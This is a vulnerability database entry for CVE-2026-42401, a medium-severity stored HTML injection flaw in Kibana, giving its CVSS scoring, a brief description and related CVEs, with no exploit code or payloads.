CVE-2026-42401
4.1 MEDIUMImproper Neutralization of Input During Web Page Generation (CWE-79) in Kibana can lead to stored HTML injection
Published: 2026-05-28 · Last updated: 2026-05-29
Severity and scoring
- CVSS
- 4.1 MEDIUM
- Vector
- CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N
- CWE
- CWE-79
Affected products
| Vendor | Product |
|---|---|
| elastic | kibana |
Description
Improper Neutralization of Input During Web Page Generation (CWE-79) in Kibana can lead to stored HTML injection. A user with write access to an Elasticsearch index could persist crafted markup which, when subsequently rendered through an affected Kibana view by another user, was not sufficiently sanitized. Successful exploitation could result in unauthorized UI manipulation and outbound network requests issued from the viewing user's browser session.
Source: NVD
References
Related CVEs
Same vendor
- CVE-2026-49095 — Improper Input Validation (CWE-20) in the Kibana Fleet agent policy management feature can lead to privilege escalation (6.5 MEDIUM)
- CVE-2026-49094 — Uncontrolled Resource Consumption (CWE-400) in Kibana can lead to denial of service via Excessive Allocation (CAPEC-130) (6.5 MEDIUM)
- CVE-2026-49093 — Server-Side Request Forgery (CWE-918) in Kibana can allow an authenticated user with connector management privileges to bypass the operat... (6.3 MEDIUM)
- CVE-2026-42400 — Uncontrolled Resource Consumption (CWE-400) in Kibana can lead to denial of service via Excessive Allocation (CAPEC-130) (6.5 MEDIUM)
- CVE-2026-42399 — Uncontrolled Resource Consumption (CWE-400) in Kibana can lead to denial of service via Excessive Allocation (CAPEC-130) (6.5 MEDIUM)
Same CWE
- CVE-2026-48157 — Slim is a PHP micro framework that enables users to write simple web applications and APIs (6.1 MEDIUM)
- CVE-2026-52702 — Unauthenticated Cross Site Scripting (XSS) in SEO Redirection <= 9.17 versions (7.1 HIGH)
- CVE-2026-49773 — Subscriber Cross Site Scripting (XSS) in FV Flowplayer Video Player < 7.5.51.7212 versions (6.5 MEDIUM)
- CVE-2026-49055 — Unauthenticated Cross Site Scripting (XSS) in Drag and Drop Multiple File Upload – Contact Form 7 <= 1.3.9.7 versions (7.1 HIGH)
- CVE-2026-48966 — Unauthenticated Cross Site Scripting (XSS) in Funnel Builder by FunnelKit <= 3.15.0.2 versions (7.1 HIGH)